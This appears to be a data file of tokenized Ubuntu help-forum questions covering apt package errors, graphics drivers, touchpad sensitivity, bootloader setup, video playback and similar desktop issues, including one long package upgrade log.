304046	installing update-manager-core in natty 11.04	my ubuntu version ( server ) : root @ li339-83 : ~ # lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 11.04 release : 11.04 codename : natty root @ li339-83 : ~ # when i do apt-get install update-manager-core i get the following error : err http : //us.archive.ubuntu.com/ubuntu/ natty-updates/main update-manager-core i386 1:0.150.5.4 404 not found [ ip : 91.189.91.13 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main update-manager-core i386 1:0.150.5.4 404 not found [ ip : 2001:67c:1360:8c01 : :23 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/u/update-manager/update-manager-core_0.150.5.4_i386.deb 404 not found [ ip : 2001:67c:1360:8c01 : :23 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? running apt-get install -- fix-missing update-manager-core results in : err http : //us.archive.ubuntu.com/ubuntu/ natty-updates/main update-manager-core i386 1:0.150.5.4 404 not found [ ip : 91.189.91.13 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main update-manager-core i386 1:0.150.5.4 404 not found [ ip : 2001:67c:1360:8c01 : :23 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/u/update-manager/update-manager-core_0.150.5.4_i386.deb 404 not found [ ip : 2001:67c:1360:8c01 : :23 80 ] e : internal error , ordering was unable to handle the media swap after installing and running banish404 , root @ li339-83 : ~ # apt-get install update-manager-core reading package lists ... done building dependency tree reading state information ... done e : unable to locate package update-manager-core seems banish404 was partially installed : root @ li339-83 : ~ # apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : banish404 : depends : zenity but it is not installable e : unmet dependencies . try using -f. trying using dist-upgrade : root @ li339-83 : ~ # sudo apt-get -f dist-upgrade reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done calculating upgrade ... done the following packages will be removed : banish404 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 45.1 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 26880 files and directories currently installed . ) removing banish404 ... root @ li339-83 : ~ # sudo apt-get -f dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . root @ li339-83 : ~ # have added more debug details here - http : //pastebin.com/n6ydwhgh i am not sure why ubuntu is not able to do such a simple task . do i need to modify sources.list ?
304047	why the $ 2.99 minimum price for apps	according to http : //developer.ubuntu.com/publish/ apps can only be published at a $ 2.99 minimum price , which seems to include the ubuntu touch apps . 99 % of the apps i have purchased on android are $ 0.99 if ubuntu goes ahead with this , is n't it going to : 1 ) exclude a lot of developers/apps . 2 ) or force developers to push up the price , so that you end up paying 3x as much for the same product . 3 ) or give the app away free but force more adds or in game/app purchases which are the bane of the app world .
304051	how to enable multiple displays with catalyst drivers in 13.04 ?	first , i installed ubuntu 13.04 . i have an ati radeon hd 7850 . the open source drivers allowed multiple displays , but were horrendously laggy ( even opening a browser window took several seconds ) . when i installed the catalyst proprietary drivers , performance was perfect . the only problem is that trying to enable dual-monitors in the catalyst center was grayed out and in the ubuntu settings resulted in the resolution error . is there any way around this ? here is the quote from the error box when trying to change display settings . the selected configuration for displays could not be applied required virtual size does not fit available size : requested= ( 3840 , 1080 ) , minimum= ( 320 , 200 ) , maximum= ( 1920 , 1920 ) here is the grayed out option in catalyst ...
304055	alps touchpad too sensitive after upgrade	i tryed to switch to a new ubuntu version , but my touchpad makes troubles . i use a dell latitude e6520 laptop with an alps touchpad . currently i 'm on ubuntu 11.10. grep -b 5 mouse /proc/bus/input/devices ( under 11.10 ) i : bus=0011 vendor=0002 product=0005 version=7326 n : name= '' imps/2 alps glidepoint '' p : phys=isa0060/serio1/input0 s : sysfs=/devices/platform/i8042/serio1/input/input13 u : uniq= h : handlers=mouse0 event13 the touchpad works well with 11.10 . tapping and edge scrolling is going well . when i switch to 12.04 , 12.10 or 13.04 the touchpad is a bit `` jumpy '' . i ca n't exactly tap buttons with the cursor . the sensivity is too high . i tryed to modify the kernel or replace the touchpad setting , but without success . grep -b 5 mouse /proc/bus/input/devices ( under > 12.04 ) i : bus=0011 vendor=0002 product=0008 version=7326 n : name= '' alpsps/2 alps dualpoint touchpad '' p : phys=isa0060/serio1/input0 s : sysfs=/devices/platform/i8042/serio1/input/input9 u : uniq= h : handlers=mouse1 event9 how can i fix this ? is there any way ubuntu > 12.04 will recognize my touchpad like 11.10 did ? i tryed with following , but without success ( tapping was fixed , but edge scrolling not possible anymore ) : sudo modprobe -r psmouse sudo modprobe psmouse proto=imps also the psmouse-alps-dkms driver didnt work for me . thanks !
304056	what should i put on the `` devvice for boot loader installation '' part ?	i have a laptop that has windows 7 installed . even before installing windows 7 , i already made a second partition to store extra files , etc . now that i 'm wanting to dual boot to ubuntu 13.04 , i have moved all the files that was in the second partition ( drive d ) to a folder in the first partition ( drive c ) . now since i do n't need to repartition drive d , i went to `` advanced '' . here i am presented with the list of hard drives and below it , i can see `` device for boot loader installation '' . what do i select on here ? my choicse are /dev/sda /dev/sda1 windows 7 ( loader ) /dev/sda2 ( this is probably drive c. ) /dev/sda3 ( this is probably drive d. ) additional questions : what file system should i format drive d in and also what mount point should i select ?
304057	discrete gpu not working after update	i updated ubuntu few days ago and my discrete gpu stopped working . when i start laptop i get some errors starting with unable to handle kernel paging request at ... some gibberish ( probably some kind of adress ) .. i have to presctrl+alt+f7 ( or maybe f8 ca n't remember ) to get to the logging screen where i proceed with logging . everything seams to work fine except when i try to run something with discrete gpu . i get error : [ 24723.313790 ] [ error ] can not access secondary gpu - error : could not enable discrete graphics card [ 24723.313819 ] [ error ] aborting because fallback start is disabled . i have no idea what went wrong . edit : i have ubuntu 12.04.2 lts geforce gt 635m $ nvidia-settings -- version nvidia-settings : version 304.88 ( buildd @ allspice ) tue apr 9 12:16:11 utc 2013 he nvidia x server settings tool . this program is used to configure the nvidia linux graphics driver . for more detail , please see the nvidia-settings ( 1 ) man page . copyright ( c ) 2004 - 2010 nvidia corporation . $ optirun -- version optirun ( bumblebee ) 3.2.1 copyright ( c ) 2011 the bumblebee project license gplv3+ : gnu gpl version 3 or later < http : //gnu.org/licenses/gpl.html > . this is free software : you are free to change and redistribute it . there is no warranty , to the extent permitted by law . edit 2 : recently i removed 'binutils-gold ' because i had problems with haskell ghc compiler . and here is the aptitude log for that upgrade after which gpu broke down : start-date : 2013-06-02 23:53:01 commandline : aptdaemon role='role-commit-packages ' sender=':1.199' install : linux-headers-3.2.0-45 : amd64 ( 3.2.0-45.70 ) , linux-image-3.2.0-45-generic : amd64 ( 3.2.0-45.70 ) , linux-headers-3.2.0-45-generic : amd64 ( 3.2.0-45.70 ) upgrade : libsmbclient : amd64 ( 3.6.3-2ubuntu2.4 , 3.6.3-2ubuntu2.6 ) , libkprintutils4 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , libpam-winbind : amd64 ( 3.6.3-2ubuntu2.4 , 3.6.3-2ubuntu2.6 ) , virtualgl : amd64 ( 2.3.2-1~preciseppa1 , 2.3.2-1~preciseppa2 ) , dnsmasq-base : amd64 ( 2.59-4 , 2.59-4ubuntu0.1 ) , libc-bin : amd64 ( 2.15-0ubuntu10.3 , 2.15-0ubuntu10.4 ) , unity-2d : amd64 ( 5.12.0-0ubuntu1.2 , 5.14.0-0ubuntu1 ) , python-aptdaemon.pkcompat : amd64 ( 0.43+bzr805-0ubuntu8 , 0.43+bzr805-0ubuntu9 ) , libcupsppdc1 : amd64 ( 1.5.3-0ubuntu6 , 1.5.3-0ubuntu8 ) , unity-2d-common : amd64 ( 5.12.0-0ubuntu1.2 , 5.14.0-0ubuntu1 ) , telepathy-gabble : amd64 ( 0.16.0-0ubuntu2 , 0.16.0-0ubuntu3 ) , nautilus : amd64 ( 3.4.2-0ubuntu7 , 3.4.2-0ubuntu8 ) , libcupsimage2 : amd64 ( 1.5.3-0ubuntu6 , 1.5.3-0ubuntu8 ) , libcupsimage2 : i386 ( 1.5.3-0ubuntu6 , 1.5.3-0ubuntu8 ) , gvfs-fuse : amd64 ( 1.12.1-0ubuntu1.1 , 1.12.1-0ubuntu1.2 ) , libdrm-nouveau2 : amd64 ( 2.4.39-0ubuntu1 , 2.4.43-0ubuntu0.0.1 ) , libdrm-nouveau2 : i386 ( 2.4.39-0ubuntu1 , 2.4.43-0ubuntu0.0.1 ) , libcupscgi1 : amd64 ( 1.5.3-0ubuntu6 , 1.5.3-0ubuntu8 ) , libknewstuff2-4 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , poppler-utils : amd64 ( 0.18.4-1ubuntu3 , 0.18.4-1ubuntu3.1 ) , libknewstuff3-4 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , network-manager-gnome : amd64 ( 0.9.4.1-0ubuntu2.1 , 0.9.4.1-0ubuntu2.3 ) , smbclient : amd64 ( 3.6.3-2ubuntu2.4 , 3.6.3-2ubuntu2.6 ) , libcupsdriver1 : amd64 ( 1.5.3-0ubuntu6 , 1.5.3-0ubuntu8 ) , thunderbird-locale-en-us : amd64 ( 17.0.4+build1-0ubuntu0.12.04.1 , 17.0.6+build1-0ubuntu0.12.04.1 ) , libunity-2d-private0 : amd64 ( 5.12.0-0ubuntu1.2 , 5.14.0-0ubuntu1 ) , libgck-1-0 : amd64 ( 3.2.2-2ubuntu4 , 3.2.2-2ubuntu4.1 ) , libkdeclarative5 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , libnm-gtk0 : amd64 ( 0.9.4.1-0ubuntu2.1 , 0.9.4.1-0ubuntu2.3 ) , libnepomukquery4a : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , gvfs-backends : amd64 ( 1.12.1-0ubuntu1.1 , 1.12.1-0ubuntu1.2 ) , libdrm-radeon1 : amd64 ( 2.4.39-0ubuntu1 , 2.4.43-0ubuntu0.0.1 ) , libdrm-radeon1 : i386 ( 2.4.39-0ubuntu1 , 2.4.43-0ubuntu0.0.1 ) , language-selector-gnome : amd64 ( 0.79.2 , 0.79.3 ) , nvidia-current : amd64 ( 304.84-0ubuntu1~precise~xup2 , 304.88-0ubuntu0.0.2 ) , xserver-xorg-core : amd64 ( 1.11.4-0ubuntu10.12 , 1.11.4-0ubuntu10.13 ) , unity-scope-video-remote : amd64 ( 0.3.5-0ubuntu2.1 , 0.3.5-0ubuntu2.2 ) , thunderbird : amd64 ( 17.0.4+build1-0ubuntu0.12.04.1 , 17.0.6+build1-0ubuntu0.12.04.1 ) , kdelibs5 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , xserver-common : amd64 ( 1.11.4-0ubuntu10.12 , 1.11.4-0ubuntu10.13 ) , libthreadweaver4 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , accountsservice : amd64 ( 0.6.15-2ubuntu9.5 , 0.6.15-2ubuntu9.6 ) , libdee-1.0-4 : amd64 ( 1.0.10-0ubuntu1 , 1.0.10-0ubuntu1.1 ) , lightdm : amd64 ( 1.2.3-0ubuntu2 , 1.2.3-0ubuntu2.1 ) , libkdecore5 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , libnepomukutils4 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , libktexteditor4 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , linux-generic : amd64 ( 3.2.0.39.47 , 3.2.0.45.54 ) , libtiff4-dev : amd64 ( 3.9.5-2ubuntu1.4 , 3.9.5-2ubuntu1.5 ) , cups-client : amd64 ( 1.5.3-0ubuntu6 , 1.5.3-0ubuntu8 ) , firefox-globalmenu : amd64 ( 19.0.2+build1-0ubuntu0.12.04.1 , 21.0+build2-0ubuntu0.12.04.3 ) , libkmediaplayer4 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , gvfs-libs : amd64 ( 1.12.1-0ubuntu1.1 , 1.12.1-0ubuntu1.2 ) , gvfs-libs : i386 ( 1.12.1-0ubuntu1.1 , 1.12.1-0ubuntu1.2 ) , libgcr-3-1 : amd64 ( 3.2.2-2ubuntu4 , 3.2.2-2ubuntu4.1 ) , telepathy-idle : amd64 ( 0.1.11-2 , 0.1.11-2ubuntu0.1 ) , libwbclient0 : amd64 ( 3.6.3-2ubuntu2.4 , 3.6.3-2ubuntu2.6 ) , libkrosscore4 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , bumblebee : amd64 ( 3.1-1~preciseppa1 , 3.2.1-1~preciseppa3 ) , language-selector-common : amd64 ( 0.79.2 , 0.79.3 ) , python-apt : amd64 ( 0.8.3ubuntu7 , 0.8.3ubuntu7.1 ) , virtualgl-libs-ia32 : i386 ( 2.3.2-1~preciseppa1 , 2.3.2-1~preciseppa2 ) , libpoppler-qt4-3 : amd64 ( 0.18.4-1ubuntu3 , 0.18.4-1ubuntu3.1 ) , bash : amd64 ( 4.2-2ubuntu2 , 4.2-2ubuntu2.1 ) , gvfs-bin : amd64 ( 1.12.1-0ubuntu1.1 , 1.12.1-0ubuntu1.2 ) , libgnutls26 : amd64 ( 2.12.14-5ubuntu3.2 , 2.12.14-5ubuntu3.4 ) , libgnutls26 : i386 ( 2.12.14-5ubuntu3.2 , 2.12.14-5ubuntu3.4 ) , python-apt-common : amd64 ( 0.8.3ubuntu7 , 0.8.3ubuntu7.1 ) , gnome-keyring : amd64 ( 3.2.2-2ubuntu4 , 3.2.2-2ubuntu4.1 ) , gvfs-common : amd64 ( 1.12.1-0ubuntu1.1 , 1.12.1-0ubuntu1.2 ) , apport : amd64 ( 2.0.1-0ubuntu17.1 , 2.0.1-0ubuntu17.2 ) , mysql-server-core-5.5 : amd64 ( 5.5.31-0ubuntu0.12.04.1 , 5.5.31-0ubuntu0.12.04.2 ) , plymouth-label : amd64 ( 0.8.2-2ubuntu31 , 0.8.2-2ubuntu31.1 ) , libtiffxx0c2 : amd64 ( 3.9.5-2ubuntu1.4 , 3.9.5-2ubuntu1.5 ) , mtools : amd64 ( 4.0.12-1 , 4.0.12-1ubuntu0.12.04.1 ) , firefox-locale-zh-hans : amd64 ( 19.0.2+build1-0ubuntu0.12.04.1 , 21.0+build2-0ubuntu0.12.04.3 ) , plymouth-theme-ubuntu-logo : amd64 ( 0.8.2-2ubuntu31 , 0.8.2-2ubuntu31.1 ) , libmysqlclient18 : amd64 ( 5.5.31-0ubuntu0.12.04.1 , 5.5.31-0ubuntu0.12.04.2 ) , libmysqlclient18 : i386 ( 5.5.31-0ubuntu0.12.04.1 , 5.5.31-0ubuntu0.12.04.2 ) , x11proto-gl-dev : amd64 ( 1.4.16-1~precise1 , 1.4.16-1~precise2 ) , libaccountsservice0 : amd64 ( 0.6.15-2ubuntu9.5 , 0.6.15-2ubuntu9.6 ) , libsolid4 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , unity-2d-spread : amd64 ( 5.12.0-0ubuntu1.2 , 5.14.0-0ubuntu1 ) , libc6-i386 : amd64 ( 2.15-0ubuntu10.3 , 2.15-0ubuntu10.4 ) , cups-ppdc : amd64 ( 1.5.3-0ubuntu6 , 1.5.3-0ubuntu8 ) , gir1.2-gkbd-3.0 : amd64 ( 3.4.0.2-1 , 3.4.0.2-1ubuntu0.1 ) , libnepomuk4 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , deja-dup : amd64 ( 22.0-0ubuntu3 , 22.0-0ubuntu4 ) , unity-2d-panel : amd64 ( 5.12.0-0ubuntu1.2 , 5.14.0-0ubuntu1 ) , linux-firmware : amd64 ( 1.79.1 , 1.79.4 ) , samba-common : amd64 ( 3.6.3-2ubuntu2.4 , 3.6.3-2ubuntu2.6 ) , simple-scan : amd64 ( 3.4.1-0ubuntu1.1 , 3.4.3-0ubuntu1 ) , python-aptdaemon : amd64 ( 0.43+bzr805-0ubuntu8 , 0.43+bzr805-0ubuntu9 ) , libkdnssd4 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , libkparts4 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , firefox : amd64 ( 19.0.2+build1-0ubuntu0.12.04.1 , 21.0+build2-0ubuntu0.12.04.3 ) , libdrm2 : amd64 ( 2.4.39-0ubuntu1 , 2.4.43-0ubuntu0.0.1 ) , libdrm2 : i386 ( 2.4.39-0ubuntu1 , 2.4.43-0ubuntu0.0.1 ) , cups-common : amd64 ( 1.5.3-0ubuntu6 , 1.5.3-0ubuntu8 ) , libnm-gtk-common : amd64 ( 0.9.4.1-0ubuntu2.1 , 0.9.4.1-0ubuntu2.3 ) , libcups2 : amd64 ( 1.5.3-0ubuntu6 , 1.5.3-0ubuntu8 ) , libcups2 : i386 ( 1.5.3-0ubuntu6 , 1.5.3-0ubuntu8 ) , kdoctools : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , libglu1-mesa-dev : amd64 ( 8.0.4-0ubuntu0.4 , 8.0.4-0ubuntu0.5 ) , openssh-client : amd64 ( 5.9p1-5ubuntu1 , 5.9p1-5ubuntu1.1 ) , libdrm-dev : amd64 ( 2.4.39-0ubuntu1 , 2.4.43-0ubuntu0.0.1 ) , multiarch-support : amd64 ( 2.15-0ubuntu10.3 , 2.15-0ubuntu10.4 ) , mysql-client-core-5.5 : amd64 ( 5.5.31-0ubuntu0.12.04.1 , 5.5.31-0ubuntu0.12.04.2 ) , python-problem-report : amd64 ( 2.0.1-0ubuntu17.1 , 2.0.1-0ubuntu17.2 ) , libcurl3-nss : amd64 ( 7.22.0-3ubuntu4 , 7.22.0-3ubuntu4.1 ) , alsa-utils : amd64 ( 1.0.25-1ubuntu5 , 1.0.25-1ubuntu5.2 ) , libkrossui4 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , libdrm-nouveau1a : amd64 ( 2.4.39-0ubuntu1 , 2.4.43-0ubuntu0.0.1 ) , gir1.2-accountsservice-1.0 : amd64 ( 0.6.15-2ubuntu9.5 , 0.6.15-2ubuntu9.6 ) , libkidletime4 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , linux-headers-generic : amd64 ( 3.2.0.39.47 , 3.2.0.45.54 ) , aptdaemon : amd64 ( 0.43+bzr805-0ubuntu8 , 0.43+bzr805-0ubuntu9 ) , libdrm-intel1 : amd64 ( 2.4.39-0ubuntu1 , 2.4.43-0ubuntu0.0.1 ) , libdrm-intel1 : i386 ( 2.4.39-0ubuntu1 , 2.4.43-0ubuntu0.0.1 ) , linux-image-generic : amd64 ( 3.2.0.39.47 , 3.2.0.45.54 ) , cups : amd64 ( 1.5.3-0ubuntu6 , 1.5.3-0ubuntu8 ) , libkcmutils4 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , libpoppler-glib8 : amd64 ( 0.18.4-1ubuntu3 , 0.18.4-1ubuntu3.1 ) , google-talkplugin : amd64 ( 3.16.0.0-1 , 3.19.1.0-1 ) , libgnomekbd7 : amd64 ( 3.4.0.2-1 , 3.4.0.2-1ubuntu0.1 ) , libasound2 : amd64 ( 1.0.25-1ubuntu10.1 , 1.0.25-1ubuntu10.2 ) , libasound2 : i386 ( 1.0.25-1ubuntu10.1 , 1.0.25-1ubuntu10.2 ) , libkfile4 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , firefox-locale-en : amd64 ( 19.0.2+build1-0ubuntu0.12.04.1 , 21.0+build2-0ubuntu0.12.04.3 ) , flashplugin-installer : amd64 ( 11.2.202.275ubuntu0.12.04.1 , 11.2.202.285ubuntu0.12.04.1 ) , isc-dhcp-client : amd64 ( 4.1.esv-r4-0ubuntu5.6 , 4.1.esv-r4-0ubuntu5.8 ) , libkpty4 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , unity-2d-shell : amd64 ( 5.12.0-0ubuntu1.2 , 5.14.0-0ubuntu1 ) , nautilus-data : amd64 ( 3.4.2-0ubuntu7 , 3.4.2-0ubuntu8 ) , virtualgl-libs : amd64 ( 2.3.2-1~preciseppa1 , 2.3.2-1~preciseppa2 ) , virtualgl-libs : i386 ( 2.3.2-1~preciseppa1 , 2.3.2-1~preciseppa2 ) , libkntlm4 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , cups-bsd : amd64 ( 1.5.3-0ubuntu6 , 1.5.3-0ubuntu8 ) , libtiff4 : amd64 ( 3.9.5-2ubuntu1.4 , 3.9.5-2ubuntu1.5 ) , libtiff4 : i386 ( 3.9.5-2ubuntu1.4 , 3.9.5-2ubuntu1.5 ) , bumblebee-nvidia : amd64 ( 3.1-1~preciseppa1 , 3.2.1-1~preciseppa3 ) , libplasma3 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , libkimproxy4 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , libkemoticons4 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , libplymouth2 : amd64 ( 0.8.2-2ubuntu31 , 0.8.2-2ubuntu31.1 ) , bash-completion : amd64 ( 1.3-1ubuntu8 , 1.3-1ubuntu8.1 ) , bbswitch-dkms : amd64 ( 0.6-1~preciseppa1 , 0.7-1~preciseppa1 ) , kdelibs-bin : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , libkdewebkit5 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , libc6-dev : amd64 ( 2.15-0ubuntu10.3 , 2.15-0ubuntu10.4 ) , plymouth-theme-ubuntu-text : amd64 ( 0.8.2-2ubuntu31 , 0.8.2-2ubuntu31.1 ) , libkjsembed4 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , thunderbird-globalmenu : amd64 ( 17.0.4+build1-0ubuntu0.12.04.1 , 17.0.6+build1-0ubuntu0.12.04.1 ) , thunderbird-gnome-support : amd64 ( 17.0.4+build1-0ubuntu0.12.04.1 , 17.0.6+build1-0ubuntu0.12.04.1 ) , libkio5 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , libkjsapi4 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , python-apport : amd64 ( 2.0.1-0ubuntu17.1 , 2.0.1-0ubuntu17.2 ) , gir1.2-dee-1.0 : amd64 ( 1.0.10-0ubuntu1 , 1.0.10-0ubuntu1.1 ) , aptdaemon-data : amd64 ( 0.43+bzr805-0ubuntu8 , 0.43+bzr805-0ubuntu9 ) , liblightdm-gobject-1-0 : amd64 ( 1.2.3-0ubuntu2 , 1.2.3-0ubuntu2.1 ) , openssl : amd64 ( 1.0.1-4ubuntu5.8 , 1.0.1-4ubuntu5.9 ) , rsyslog : amd64 ( 5.8.6-1ubuntu8.1 , 5.8.6-1ubuntu8.2 ) , kdelibs5-data : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , libcurl3-gnutls : amd64 ( 7.22.0-3ubuntu4 , 7.22.0-3ubuntu4.1 ) , geoclue-ubuntu-geoip : amd64 ( 0.0.2-0ubuntu6 , 0.0.2-0ubuntu6.3 ) , gvfs : amd64 ( 1.12.1-0ubuntu1.1 , 1.12.1-0ubuntu1.2 ) , gvfs : i386 ( 1.12.1-0ubuntu1.1 , 1.12.1-0ubuntu1.2 ) , python-aptdaemon.gtk3widgets : amd64 ( 0.43+bzr805-0ubuntu8 , 0.43+bzr805-0ubuntu9 ) , linux-libc-dev : amd64 ( 3.2.0-39.62 , 3.2.0-45.70 ) , libgcr-3-common : amd64 ( 3.2.2-2ubuntu4 , 3.2.2-2ubuntu4.1 ) , libkms1 : amd64 ( 2.4.39-0ubuntu1 , 2.4.43-0ubuntu0.0.1 ) , samba-common-bin : amd64 ( 3.6.3-2ubuntu2.4 , 3.6.3-2ubuntu2.6 ) , winbind : amd64 ( 3.6.3-2ubuntu2.4 , 3.6.3-2ubuntu2.6 ) , ssh-askpass-gnome : amd64 ( 5.9p1-5ubuntu1 , 5.9p1-5ubuntu1.1 ) , libglu1-mesa : amd64 ( 8.0.4-0ubuntu0.4 , 8.0.4-0ubuntu0.5 ) , libglu1-mesa : i386 ( 8.0.4-0ubuntu0.4 , 8.0.4-0ubuntu0.5 ) , isc-dhcp-common : amd64 ( 4.1.esv-r4-0ubuntu5.6 , 4.1.esv-r4-0ubuntu5.8 ) , libcupsmime1 : amd64 ( 1.5.3-0ubuntu6 , 1.5.3-0ubuntu8 ) , libc-dev-bin : amd64 ( 2.15-0ubuntu10.3 , 2.15-0ubuntu10.4 ) , libc6 : amd64 ( 2.15-0ubuntu10.3 , 2.15-0ubuntu10.4 ) , libc6 : i386 ( 2.15-0ubuntu10.3 , 2.15-0ubuntu10.4 ) , libkde3support4 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , libknotifyconfig4 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , libc6-dev-i386 : amd64 ( 2.15-0ubuntu10.3 , 2.15-0ubuntu10.4 ) , apport-gtk : amd64 ( 2.0.1-0ubuntu17.1 , 2.0.1-0ubuntu17.2 ) , libnautilus-extension1a : amd64 ( 3.4.2-0ubuntu7 , 3.4.2-0ubuntu8 ) , kdelibs5-plugins : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , libpam-gnome-keyring : amd64 ( 3.2.2-2ubuntu4 , 3.2.2-2ubuntu4.1 ) , libkhtml5 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , libkdeui5 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , mysql-common : amd64 ( 5.5.31-0ubuntu0.12.04.1 , 5.5.31-0ubuntu0.12.04.2 ) , libkdesu5 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , libpoppler19 : amd64 ( 0.18.4-1ubuntu3 , 0.18.4-1ubuntu3.1 ) , thunderbird-locale-en : amd64 ( 17.0.4+build1-0ubuntu0.12.04.1 , 17.0.6+build1-0ubuntu0.12.04.1 ) , x11proto-dri2-dev : amd64 ( 2.8-1~precise1 , 2.8-1~precise2 ) , firefox-gnome-support : amd64 ( 19.0.2+build1-0ubuntu0.12.04.1 , 21.0+build2-0ubuntu0.12.04.3 ) , libkutils4 : amd64 ( 4.8.5-0ubuntu0.1 , 4.8.5-0ubuntu0.2 ) , plymouth : amd64 ( 0.8.2-2ubuntu31 , 0.8.2-2ubuntu31.1 ) , nvidia-settings : amd64 ( 304.84-0ubuntu1~precise~xup1 , 304.88-0ubuntu0.0.2 ) , gvfs-daemons : amd64 ( 1.12.1-0ubuntu1.1 , 1.12.1-0ubuntu1.2 ) , libssl1.0.0 : amd64 ( 1.0.1-4ubuntu5.8 , 1.0.1-4ubuntu5.9 ) , libssl1.0.0 : i386 ( 1.0.1-4ubuntu5.8 , 1.0.1-4ubuntu5.9 ) , libllvm3.1 : amd64 ( 3.1-2ubuntu1~12.04 , 3.1-2ubuntu1~12.04.1 ) , libllvm3.1 : i386 ( 3.1-2ubuntu1~12.04 , 3.1-2ubuntu1~12.04.1 ) , libgnomekbd-common : amd64 ( 3.4.0.2-1 , 3.4.0.2-1ubuntu0.1 ) end-date : 2013-06-03 00:07:13
304059	how to copy a vcd	i am trying to copy a cd containing mpeg , .dat videos . now i want to transfer it to my notebook through pendrive as there is no cd-rom there.and normally copying the files isnt working , . so how do i do that ? i am thinking of creating ab iso of the vcd and mount that iso in my notebook . but how do i do this ?
304068	13.04 plus chrome = video with audio at too high of a pitch	it doesnt happen at first , but ive tried this twice . at first the audio is fine , but eventually the audio goes to where everything sounds like an alvin and the chipmunks record . it stays in sync with the video , but the audio is too high . restarts do not fix the issue .
304071	how to indicatorize a systray-only app ?	i just realized that under 13.04 it is n't possible any more to add applications which are using the systray to a whitelist . i found the suggestion of downloading a patched version of unity but i 'd rather make one app i like ( see bug report for blueproximity ) use app-indicator instead . i saw several python apps exist for application indicator , for instance classicmenu indicator . so i want to try to adapt the program . what i need now is a pointer where/how to start , maybe a few hints . ( no experience with python but plenty with several other languages )
304074	getting a linux mint graphical interface on ubuntu 12.04.2 server	after successful installation of ubuntu 12.04.2 , a change is needed from graphics-less ubuntu server terminal-style interface to a linux mint graphical interface . i have booted with an inserted linux mint 15 cinnamon install disc . i had no response beyond an initial prompt between similar `` ubuntu with linux '' options that led to operation just like it was without a disc-inserted-boot without a directed linux installation . this situation is ubuntu server operating on 160 gb of 320 gb with an operator who 's inexperienced with terminal-style interfaces and a need for a graphical interface .
304075	video playback , choppy and black screen	i just noticed that it is impossible to playback videos anymore on my ubuntu 13.04 . everything was fine before , and i have n't done any installations lately , except updates and gstreamer-tools . when i try to playback video on vlc player , appears just black screen and sound . nothing more . one workaround was to disable accelerated video output but then it became choppy or jumpy , ( do n't know the right word ) so it is not a fix . finally i changed vlc video output setting to x11 video output . now video plays fine in vlc , but in default totem video player it still is choppy . and totem did not have any black screen , just choppy playback . not sure if it is related , but i am running optimus enabled pc with bumblebee and i think proprietary nvidia driver . so i would like to know what is the problem ? why it stopped playing videos unexpectedly and how can i fix this ? thanks !
